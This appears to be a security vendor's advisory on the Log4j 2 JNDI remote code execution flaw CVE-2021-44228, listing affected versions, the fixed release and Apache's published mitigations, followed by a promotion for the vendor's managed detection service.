A High severity vulnerability with a CVSSv3 score of 10 impacting multiple versions of Apache Log4j 2 was disclosed via the project’s GitHub on December 9, 2021.
Descripton: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Log4j 2 is a widely used open source java logging library developed and maintained by the Apache Foundation. The vulnerability (CVE-2021-44228) allows for unauthenticated remote code execution.
Affected Versions: all versions from 2.0-beta9 to 2.14.1
Fixed Version: 2.15.0
While patching may be difficult, it is still the number one action that can fix this vulnerability. Apache released version 2.15.0-rc1, quickly followed by 2.15.0-rc2 after a bypass was discovered. Apache has also suggested mitigations for those who cannot patch
Mitigations:
- In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
- For releases from 2.7 through 2.14.1 all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m.
- For releases from 2.0-beta9 to 2.7, the only mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
Observian's Managed Detection and Response (MDR), a part of our managed security service, can help you stay informed of vulnerabilities like this and many more security related events. Observian is closely partnered with Lacework & integrates its Utah based Managed Service Offering with Lacework’s Cutting Edge Solution to remove the Complexity & Cost of Cloud Security & Compliance. Learn more about our service here https://www.observian.com/aws/managed-service.
